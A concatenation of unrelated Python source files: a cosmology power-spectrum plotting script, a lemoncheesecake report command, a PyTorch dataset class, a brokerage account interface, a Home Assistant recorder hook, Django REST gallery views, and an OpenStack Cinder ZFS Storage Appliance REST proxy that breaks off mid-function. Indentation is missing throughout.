D_class_begin = scipy.interpolate.interp1d(np.log(a_bg), np.log(D_class), kind='cubic')(np.log(a_begin))
D_concept_begin = scipy.interpolate.interp1d(np.log(a_bg), np.log(D_concept), kind='cubic')(np.log(a_begin))
D_class = D_class * (D_concept_begin/D_class_begin) # same D at a_begin
facs = scipy.interpolate.interp1d(np.log(a_bg), D_concept/D_class, kind='cubic')(np.log([1/(1 + z) for z in z_values_all]))**2
P_class = [P_cl*fac for P_cl, fac in zip(P_class, facs)]
# Match at a_begin (difference in gauge)
fac = P_ini/P_class[0]
P_class = [P_cl*fac for P_cl in P_class]
return P_class
k_nyq = k_nyq_particles(boxsize)
mask = get_mask(k, k_nyq)
P_class = get_class(boxsize)
def plot(i, ax, P_c, P_g, P_cl, clip_on=True):
zorder = -100*(i+1)
z = z_values_all[i]
if z == 0.5:
z = r'\text{\textonehalf}'
color = f'C{i-1}'
if i == 0:
color = f'C{len(z_values_all)-1}'
x, y = k[mask]/h, ((k/h)**1.5*P_c *h**3)[mask]
x, y = smooth(x, np.log(y))
y = np.exp(y)
ax.loglog(x, y, f'{color}-',
label=f'$z = {z}$', clip_on=clip_on, zorder=zorder)
x, y = k[mask]/h, ((k/h)**1.5*P_g *h**3)[mask]
x, y = smooth(x, np.log(y))
y = np.exp(y)
ax.loglog(x, y, f'k--', clip_on=clip_on, zorder=zorder)
ax.loglog(k[mask]/h, ((k/h)**1.5*P_cl*h**3)[mask], f'k:', lw=1, clip_on=clip_on, zorder=zorder)
# a == a_begin
plot(0, ax2, P_ini, P_ini, P_class[0], clip_on=False)
# a > a_begin
for i, (P_c, P_g, P_cl) in enumerate(zip(P_concept[boxsize], P_gadget[boxsize], P_class[1:]), 1):
plot(i, ax1, P_c, P_g, P_cl, clip_on=(i != 1))
# Legend needs to be made from ax2
z = z_values_all[i]
if z == 0.5:
z = r'\text{\textonehalf}'
color = f'C{i-1}'
if i == 0:
color = f'C{len(z_values_all)-1}'
ax2.loglog(k[mask][0], P_c[mask][0], f'{color}-', label=f'$z = {z}$')
legend1 = ax2.legend(framealpha=0.6)
handles, labels = ax2.get_legend_handles_labels()
jumpy = 0.24
jumpx = 0.0088
legend1 = ax2.legend(handles[::-1], labels[::-1], loc=(0.037 + jumpx, 0.228 + jumpy))
legend1.set_zorder(np.inf)
legend1.set_clip_on(False)
for ax in axes:
ax.set_xlim(k[0]/h, k_nyq/h)
ax2.set_xlabel(r'$k\; [h/\mathrm{Mpc}]$')
ax1.set_ylabel(r'$k^{3/2}P\; [(\mathrm{Mpc}/h)^{3/2}]$ .......')
ax1.fill([-0.155, -0.115, -0.115, -0.155, -0.155], [0.78, 0.78, 0.98, 0.98, 0.78], 'w', ec='none', clip_on=False, transform=ax1.transAxes, zorder=np.inf)
fig.subplots_adjust(wspace=0, hspace=0.205)
# hide the spines between ax and ax2
ax1.spines['bottom'].set_visible(False)
ax2.spines['top'].set_visible(False)
ax1.xaxis.tick_top()
ax1.tick_params(which='both', top=False, labeltop=False)
ax2.xaxis.tick_bottom()
# ylim
ax1.set_ylim(0.185, 6.2e+2)
ax2.set_ylim(2e-3, 0.803e-2)
# Place cut-out slanted lines
mew = 0.8
q = 22*np.pi/180
offset = 0.33
x = np.linspace(offset*np.pi, (2 - offset)*np.pi, 100)
y = np.sin(x)
X, Y = np.array([[np.cos(q), -np.sin(q)], [np.sin(q), np.cos(q)]]) @ np.array([x, y])
X -= np.mean(X)
Y -= np.mean(Y)
scale = 0.01
ex = 0.0024
for xx in (0, 1):
ax1.plot(xx + scale*X, (0 - ex) + scale*Y, 'k-',
lw=mew, transform=ax1.transAxes, zorder=1e+6, clip_on=False)
ax2.plot(xx + scale*X, (1 + ex) + scale*(n_axis - 1)*Y, 'k-',
lw=mew, transform=ax2.transAxes, zorder=1e+6, clip_on=False)
# Clean up
if xx == 1:
ax1.plot(xx + scale*X + 0.001, (0 - ex) + scale*Y - 0.008, 'w-', alpha=1,
lw=mew, transform=ax1.transAxes, zorder=1e+6, clip_on=False)
# old
#d = 0.65 # proportion of vertical to horizontal extent of the slanted line
#kwargs = dict(marker=[(-1, -d), (1, d)], markersize=8.5,
# linestyle='none', color='k', mec='k', mew=mew, clip_on=False)
#ax1.plot([0, 1], [0, 0], transform=ax1.transAxes, **kwargs)
#ax2.plot([0, 1], [1, 1], transform=ax2.transAxes, **kwargs)
# Clean a = a_begin curve at the lower right
ax2.plot([0.996, 1.004, 1.004], [-0.035, -0.035, 0.06], 'w-', lw=1.2, transform=ax2.transAxes, clip_on=False, zorder=-5, alpha=1)
# Clean a = a_begin curve at the lower left
ax2.plot([-0.004]*2, [0.6, 0.8], 'w-', lw=1.2, transform=ax2.transAxes, clip_on=False, zorder=-5, alpha=1)
# Clean a = 0.09 curve at the lower left
ax1.plot([-0.004]*2, [0.08, 0.15], 'w-', lw=1.2, transform=ax1.transAxes, clip_on=False, zorder=-5, alpha=1)
# Draw extra part of spine with tick at lower left
ax2.tick_params(which='both', labelleft=False)
ax2.plot(
[ax2.get_xlim()[0]]*2,
[ax2.get_ylim()[0], 1e-3],
'k-', lw=mew, clip_on=False,
)
ax2.plot(
[ax2.get_xlim()[0], 0.907*ax2.get_xlim()[0]],
[1e-3]*2,
'k-', lw=mew, clip_on=False,
)
ax2.text(0.804*ax2.get_xlim()[0], 0.9356*1e-3, r'$10^{-3}$', ha='right', va='center')
# Extra legend
x_leg_start = 0.3445 + jumpx
legend2 = ax2.legend(
(
ax2.plot(1, 1, '-' , color='w')
+ ax2.plot(1, 1, '--' , color='k')
+ ax2.plot(1, 1, ':', lw=1, color='k')
),
(r'\CONCEPTONE{}', r'\GADGETTWO{}', r'linear'),
loc=(x_leg_start, 0.228 + jumpy), framealpha=0.6,
)
ax2.add_artist(legend1)
ax2.add_artist(legend2)
# Rainbow
y_bot = 1.8935
y_top = y_bot + 0.0862
offsetx = 0.0123
dx = 0.01102*8/len(z_values_all)
for i in range(len(z_values_all)):
color = f'C{i-1}'
if i == 0:
color = f'C{len(z_values_all)-1}'
ax2.fill(
[
x_leg_start + offsetx + dx*i*0.995,
x_leg_start + offsetx + dx*(i+1)/0.995,
x_leg_start + offsetx + dx*(i+1)/0.995,
x_leg_start + offsetx + dx*i*0.995,
x_leg_start + offsetx + dx*i*0.995,
],
np.array([y_bot, y_bot, y_top, y_top, y_bot]) + jumpy,
color, alpha=1.0,
ec='none', transform=ax2.transAxes, zorder=np.inf, clip_on=False,
)
# Remove small legend bits
ax2.plot([0.443 + jumpx]*2, np.array([0.5, 1.5]) + jumpy, 'w', transform=ax2.transAxes, zorder=np.inf, clip_on=False, alpha=1)
ax2.set_xticks([0.1, 1])
ax2.set_xticklabels([r'$0.1$', r'$1$'])
# Save
cropsave(fig, '../figure/abspower.pdf') # no tight_layout() or bbox_inches()
|
python
|
import sys
import errno
from contextlib import contextmanager
from lemoncheesecake.cli.command import Command
from lemoncheesecake.cli.utils import auto_detect_reporting_backends, add_report_path_cli_arg, get_report_path
from lemoncheesecake.reporting import load_report
from lemoncheesecake.reporting.backends.console import print_report_as_test_run
from lemoncheesecake.reporting.console import print_report
from lemoncheesecake.filter import add_result_filter_cli_args, make_result_filter
@contextmanager
def ignore_broken_pipe():
try:
yield
# catch IOError + check errno (instead of simply catching BrokenPipeError on Python 3)
# to be Python 2 compatible
except IOError as excp:
if excp.errno == errno.EPIPE:
# Broken pipe (example: "lcc report | head"), in that case, simply exit gracefully
# We just close stderr to avoid Python warnings about ignored exception at the end of the
# command. This behavior occurs with Python3 (not 2), see :
# https://stackoverflow.com/questions/26692284/how-to-prevent-brokenpipeerror-when-doing-a-flush-in-python
# please note that the ignored exception is related to the stream wrapper of colorama
sys.stderr.close()
else:
# otherwise, re-raise
raise
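# Example: wrapping output in this context manager lets "lcc report | head" exit
# cleanly instead of erroring out when head closes the pipe early (see run_cmd below):
#
#     with ignore_broken_pipe():
#         for line in lines:
#             print(line)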
class ReportCommand(Command):
def get_name(self):
return "report"
def get_description(self):
return "Display a report"
def add_cli_args(self, cli_parser):
add_result_filter_cli_args(cli_parser)
group = cli_parser.add_argument_group("Display report")
add_report_path_cli_arg(group)
group.add_argument(
"--short", "-s", action="store_true", required=False,
help="Display report as lcc run display test results"
)
group.add_argument(
"--debug", "-d", action="store_true", required=False,
help="Show debug logs"
)
group.add_argument(
"--explicit", "-e", action="store_true", required=False,
help="Make all indicators 'explicit' (i.e not only relying on a color-code), "
"will be enforced is stdout is redirected"
)
group.add_argument(
"--max-width", "-w", type=int, required=False,
help="Set a max width for tables (default is current terminal width)"
)
def run_cmd(self, cli_args):
report_path = get_report_path(cli_args)
report = load_report(report_path, auto_detect_reporting_backends())
result_filter = make_result_filter(cli_args)
if cli_args.short:
print_report_as_test_run(report, result_filter)
else:
with ignore_broken_pipe():
print_report(
report, result_filter=result_filter, max_width=cli_args.max_width,
show_debug_logs=cli_args.debug,
explicit=cli_args.explicit or not sys.stdout.isatty()
)
return 0
|
python
|
import torch
from torch.utils.data import Dataset
class GenericDataSet(Dataset):
def __init__(self,
x_inputs: torch.Tensor,
y_targets: torch.Tensor):
if x_inputs.size()[0] != y_targets.size()[0]:
raise Exception("row count of input does not match targets")
self.__inputs = x_inputs
self.__targets = y_targets
def __len__(self):
return len(self.__inputs)
def __getitem__(self, idx):
return self.__inputs[idx], self.__targets[idx]
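# Minimal usage sketch (illustrative only, not part of the original module):
# wrap feature/target tensors and iterate over them in batches with a DataLoader.
if __name__ == "__main__":
    from torch.utils.data import DataLoader

    x = torch.randn(100, 3)          # 100 samples, 3 features
    y = torch.randint(0, 2, (100,))  # 100 binary targets
    dataset = GenericDataSet(x, y)
    loader = DataLoader(dataset, batch_size=16, shuffle=True)
    for batch_x, batch_y in loader:
        print(batch_x.shape, batch_y.shape)
        break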
|
python
|
from abc import ABC, abstractmethod
from typing import Iterable, Mapping, Optional
from bankroll.model import AccountBalance, Activity, Position
from .configuration import Settings
# Offers data about one or more brokerage accounts, initialized with data
# (e.g., exported files) or a mechanism to get the data (e.g., a live
# connection).
class AccountData(ABC):
# Instantiates the receiving type using the information in the given
# settings map.
#
# TODO: Refactor/simplify Configuration class so it can be used in cases
# like this, instead of an unintuitive mapping.
#
# TODO: Hoist `lenient` into a Setting to make this less awkward.
@classmethod
@abstractmethod
def fromSettings(
cls, settings: Mapping[Settings, str], lenient: bool
) -> "AccountData":
pass
# Returns the positions currently held, fetching the data on-demand if
# necessary.
#
# Subclasses are encouraged to memoize this result.
@abstractmethod
def positions(self) -> Iterable[Position]:
pass
# Returns historical account activity, loading it if necessary.
#
# Subclasses are encouraged to memoize this result.
@abstractmethod
def activity(self) -> Iterable[Activity]:
pass
# Returns the cash balances in the account, fetching them if necessary.
#
# Subclasses are encouraged to memoize this result.
@abstractmethod
def balance(self) -> AccountBalance:
pass
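# Illustrative sketch only (not part of bankroll): a concrete subclass must
# implement all four abstract methods. The AccountBalance/Position/Activity
# constructors are not shown in this module, so the bodies below are placeholders
# and the class name is hypothetical.
#
# class CSVAccountData(AccountData):
#     @classmethod
#     def fromSettings(cls, settings, lenient):
#         return cls()
#
#     def positions(self):
#         return []                    # no positions loaded in this sketch
#
#     def activity(self):
#         return []                    # no activity loaded in this sketch
#
#     def balance(self):
#         raise NotImplementedError("construct an AccountBalance here")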
|
python
|
"""Integration platform for recorder."""
from __future__ import annotations
from homeassistant.core import HomeAssistant, callback
from . import ATTR_AVAILABLE_MODES, ATTR_MAX_HUMIDITY, ATTR_MIN_HUMIDITY
@callback
def exclude_attributes(hass: HomeAssistant) -> set[str]:
"""Exclude static attributes from being recorded in the database."""
return {
ATTR_MIN_HUMIDITY,
ATTR_MAX_HUMIDITY,
ATTR_AVAILABLE_MODES,
}
|
python
|
from django.shortcuts import render
from .models import Image, Video
from .serializers import ImageSerializer, VideoSerializer
from accounts.permissions import isAdminOrReadOnly
from rest_framework.response import Response
from rest_framework import status
from rest_framework.viewsets import ModelViewSet
# Create your views here.
class ImageView(ModelViewSet):
queryset = Image.objects.all()
serializer_class = ImageSerializer
permission_classes = [isAdminOrReadOnly]
def create(self, request, *args, **kwargs):
"""
add an image link to the gallery
"""
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
def destroy(self, request, *args, **kwargs):
"""
Remove an image from the image gallery
"""
instance = self.get_object()
self.perform_destroy(instance)
return Response("image deleted", status=status.HTTP_204_NO_CONTENT)
class VideoView(ModelViewSet):
queryset = Video.objects.all()
serializer_class = VideoSerializer
permission_classes = [isAdminOrReadOnly]
def create(self, request, *args, **kwargs):
"""
add a video link to the gallery
"""
serializer = self.get_serializer(data=request.data)
serializer.is_valid(raise_exception=True)
self.perform_create(serializer)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=status.HTTP_201_CREATED, headers=headers)
def destroy(self, request, *args, **kwargs):
"""
Remove a video from the video gallery
"""
instance = self.get_object()
self.perform_destroy(instance)
return Response("image deleted", status=status.HTTP_204_NO_CONTENT)
|
python
|
# Copyright (c) 2014, Oracle and/or its affiliates. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
ZFS Storage Appliance Proxy
"""
import json
from oslo_log import log
from cinder import exception
from cinder.i18n import _, _LE
from cinder.volume.drivers.zfssa import restclient
from cinder.volume.drivers.zfssa import webdavclient
LOG = log.getLogger(__name__)
class ZFSSAApi(object):
"""ZFSSA API proxy class"""
def __init__(self):
self.host = None
self.url = None
self.rclient = None
def __del__(self):
if self.rclient and self.rclient.islogin():
self.rclient.logout()
def _is_pool_owned(self, pdata):
"""returns True if the pool's owner is the
same as the host.
"""
svc = '/api/system/v1/version'
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error getting version: '
'svc: %(svc)s.'
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'svc': svc,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
vdata = json.loads(ret.data)
return vdata['version']['asn'] == pdata['pool']['asn'] and \
vdata['version']['nodename'] == pdata['pool']['owner']
def set_host(self, host, timeout=None):
self.host = host
self.url = "https://" + self.host + ":215"
self.rclient = restclient.RestClientURL(self.url, timeout=timeout)
def login(self, auth_str):
"""Login to the appliance"""
if self.rclient and not self.rclient.islogin():
self.rclient.login(auth_str)
def get_pool_stats(self, pool):
"""Get space available and total properties of a pool
returns (avail, total).
"""
svc = '/api/storage/v1/pools/' + pool
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Getting Pool Stats: '
'Pool: %(pool)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'pool': pool,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.InvalidVolume(reason=exception_msg)
val = json.loads(ret.data)
if not self._is_pool_owned(val):
LOG.error(_LE('Error Pool ownership: Pool %(pool)s is not owned '
'by %(host)s.'),
{'pool': pool, 'host': self.host})
raise exception.InvalidInput(reason=pool)
avail = val['pool']['usage']['available']
total = val['pool']['usage']['total']
return avail, total
def create_project(self, pool, project, compression=None, logbias=None):
"""Create a project on a pool
Check first whether the pool exists.
"""
self.verify_pool(pool)
svc = '/api/storage/v1/pools/' + pool + '/projects/' + project
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
svc = '/api/storage/v1/pools/' + pool + '/projects'
arg = {
'name': project
}
if compression and compression != '':
arg.update({'compression': compression})
if logbias and logbias != '':
arg.update({'logbias': logbias})
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating Project: '
'%(project)s on '
'Pool: %(pool)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'project': project,
'pool': pool,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def create_initiator(self, initiator, alias, chapuser=None,
chapsecret=None):
"""Create an iSCSI initiator."""
svc = '/api/san/v1/iscsi/initiators/alias=' + alias
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
svc = '/api/san/v1/iscsi/initiators'
arg = {
'initiator': initiator,
'alias': alias
}
if chapuser and chapuser != '' and chapsecret and chapsecret != '':
arg.update({'chapuser': chapuser,
'chapsecret': chapsecret})
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating Initiator: '
'%(initiator)s on '
'Alias: %(alias)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'initiator': initiator,
'alias': alias,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def add_to_initiatorgroup(self, initiator, initiatorgroup):
"""Add an iSCSI initiator to initiatorgroup"""
svc = '/api/san/v1/iscsi/initiator-groups/' + initiatorgroup
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
svc = '/api/san/v1/iscsi/initiator-groups'
arg = {
'name': initiatorgroup,
'initiators': [initiator]
}
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Adding Initiator: '
'%(initiator)s on group'
'InitiatorGroup: %(initiatorgroup)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'initiator': initiator,
'initiatorgroup': initiatorgroup,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
else:
val = json.loads(ret.data)
inits = val['group']['initiators']
if inits is None:
exception_msg = (_('Error Getting Initiators: '
'InitiatorGroup: %(initiatorgroup)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'initiatorgroup': initiatorgroup,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
if initiator in inits:
return
inits.append(initiator)
svc = '/api/san/v1/iscsi/initiator-groups/' + initiatorgroup
arg = {
'initiators': inits
}
ret = self.rclient.put(svc, arg)
if ret.status != restclient.Status.ACCEPTED:
exception_msg = (_('Error Adding Initiator: '
'%(initiator)s on group'
'InitiatorGroup: %(initiatorgroup)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'initiator': initiator,
'initiatorgroup': initiatorgroup,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def create_target(self, alias, interfaces=None, tchapuser=None,
tchapsecret=None):
"""Create an iSCSI target.
interfaces: an array with network interfaces
tchapuser, tchapsecret: target's chapuser and chapsecret
returns target iqn
"""
svc = '/api/san/v1/iscsi/targets/alias=' + alias
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
svc = '/api/san/v1/iscsi/targets'
arg = {
'alias': alias
}
if tchapuser and tchapuser != '' and tchapsecret and \
tchapsecret != '':
arg.update({'targetchapuser': tchapuser,
'targetchapsecret': tchapsecret,
'auth': 'chap'})
if interfaces is not None and len(interfaces) > 0:
arg.update({'interfaces': interfaces})
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating Target: '
'%(alias)s'
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'alias': alias,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
val = json.loads(ret.data)
return val['target']['iqn']
def get_target(self, alias):
"""Get an iSCSI target iqn."""
svc = '/api/san/v1/iscsi/targets/alias=' + alias
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Getting Target: '
'%(alias)s'
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'alias': alias,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
val = json.loads(ret.data)
return val['target']['iqn']
def add_to_targetgroup(self, iqn, targetgroup):
"""Add an iSCSI target to targetgroup."""
svc = '/api/san/v1/iscsi/target-groups/' + targetgroup
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
svccrt = '/api/san/v1/iscsi/target-groups'
arg = {
'name': targetgroup,
'targets': [iqn]
}
ret = self.rclient.post(svccrt, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating TargetGroup: '
'%(targetgroup)s with'
'IQN: %(iqn)s'
'Return code: %(ret.status)d '
'Message: %(ret.data)s .')
% {'targetgroup': targetgroup,
'iqn': iqn,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
return
arg = {
'targets': [iqn]
}
ret = self.rclient.put(svc, arg)
if ret.status != restclient.Status.ACCEPTED:
exception_msg = (_('Error Adding to TargetGroup: '
'%(targetgroup)s with'
'IQN: %(iqn)s'
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'targetgroup': targetgroup,
'iqn': iqn,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def verify_pool(self, pool):
"""Checks whether pool exists."""
svc = '/api/storage/v1/pools/' + pool
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Verifying Pool: '
'%(pool)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'pool': pool,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def verify_project(self, pool, project):
"""Checks whether project exists."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + project
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Verifying '
'Project: %(project)s on '
'Pool: %(pool)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'project': project,
'pool': pool,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def verify_initiator(self, iqn):
"""Check whether initiator iqn exists."""
svc = '/api/san/v1/iscsi/initiators/' + iqn
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Verifying '
'Initiator: %(iqn)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
                             % {'iqn': iqn,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def verify_target(self, alias):
"""Check whether target alias exists."""
svc = '/api/san/v1/iscsi/targets/alias=' + alias
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Verifying '
'Target: %(alias)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'alias': alias,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def create_lun(self, pool, project, lun, volsize, targetgroup, specs):
"""Create a LUN.
specs - contains volume properties (e.g blocksize, compression).
"""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns'
arg = {
'name': lun,
'volsize': volsize,
'targetgroup': targetgroup,
'initiatorgroup': 'com.sun.ms.vss.hg.maskAll'
}
if specs:
arg.update(specs)
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating '
'Volume: %(lun)s '
'Size: %(size)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'lun': lun,
'size': volsize,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
val = json.loads(ret.data)
return val
def get_lun(self, pool, project, lun):
"""return iscsi lun properties."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + "/luns/" + lun
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Getting '
'Volume: %(lun)s on '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
val = json.loads(ret.data)
ret = {
'guid': val['lun']['lunguid'],
'number': val['lun']['assignednumber'],
'initiatorgroup': val['lun']['initiatorgroup'],
'size': val['lun']['volsize'],
'nodestroy': val['lun']['nodestroy']
}
if 'origin' in val['lun']:
ret.update({'origin': val['lun']['origin']})
return ret
def set_lun_initiatorgroup(self, pool, project, lun, initiatorgroup):
"""Set the initiatorgroup property of a LUN."""
if initiatorgroup == '':
initiatorgroup = 'com.sun.ms.vss.hg.maskAll'
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun
arg = {
'initiatorgroup': initiatorgroup
}
ret = self.rclient.put(svc, arg)
if ret.status != restclient.Status.ACCEPTED:
LOG.error(_LE('Error Setting Volume: %(lun)s to InitiatorGroup: '
'%(initiatorgroup)s Pool: %(pool)s Project: '
'%(project)s Return code: %(ret.status)d Message: '
'%(ret.data)s.'),
{'lun': lun,
'initiatorgroup': initiatorgroup,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
def delete_lun(self, pool, project, lun):
"""delete iscsi lun."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun
ret = self.rclient.delete(svc)
if ret.status != restclient.Status.NO_CONTENT:
LOG.error(_LE('Error Deleting Volume: %(lun)s to Pool: %(pool)s '
'Project: %(project)s Return code: %(ret.status)d '
'Message: %(ret.data)s.'),
{'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
def create_snapshot(self, pool, project, lun, snapshot):
"""create snapshot."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun + '/snapshots'
arg = {
'name': snapshot
}
ret = self.rclient.post(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Creating '
'Snapshot: %(snapshot)s on'
'Volume: %(lun)s to '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'snapshot': snapshot,
'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def delete_snapshot(self, pool, project, lun, snapshot):
"""delete snapshot."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun + '/snapshots/' + snapshot
ret = self.rclient.delete(svc)
if ret.status != restclient.Status.NO_CONTENT:
exception_msg = (_('Error Deleting '
'Snapshot: %(snapshot)s on '
'Volume: %(lun)s to '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'snapshot': snapshot,
'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def clone_snapshot(self, pool, project, lun, snapshot, clone):
"""clone snapshot."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun + '/snapshots/' + snapshot + '/clone'
arg = {
'project': project,
'share': clone,
'nodestroy': True
}
ret = self.rclient.put(svc, arg)
if ret.status != restclient.Status.CREATED:
exception_msg = (_('Error Cloning '
'Snapshot: %(snapshot)s on '
'Volume: %(lun)s of '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'snapshot': snapshot,
'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def set_lun_props(self, pool, project, lun, **kargs):
"""set lun properties."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun
if kargs is None:
return
ret = self.rclient.put(svc, kargs)
if ret.status != restclient.Status.ACCEPTED:
exception_msg = (_('Error Setting props '
'Props: %(props)s on '
'Volume: %(lun)s of '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'props': kargs,
'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
def has_clones(self, pool, project, lun, snapshot):
"""Checks whether snapshot has clones or not."""
svc = '/api/storage/v1/pools/' + pool + '/projects/' + \
project + '/luns/' + lun + '/snapshots/' + snapshot
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
exception_msg = (_('Error Getting '
'Snapshot: %(snapshot)s on '
'Volume: %(lun)s to '
'Pool: %(pool)s '
'Project: %(project)s '
'Return code: %(ret.status)d '
'Message: %(ret.data)s.')
% {'snapshot': snapshot,
'lun': lun,
'pool': pool,
'project': project,
'ret.status': ret.status,
'ret.data': ret.data})
LOG.error(exception_msg)
raise exception.VolumeBackendAPIException(data=exception_msg)
val = json.loads(ret.data)
return val['snapshot']['numclones'] != 0
def get_initiator_initiatorgroup(self, initiator):
"""Returns the initiator group of the initiator."""
groups = []
svc = "/api/san/v1/iscsi/initiator-groups"
ret = self.rclient.get(svc)
if ret.status != restclient.Status.OK:
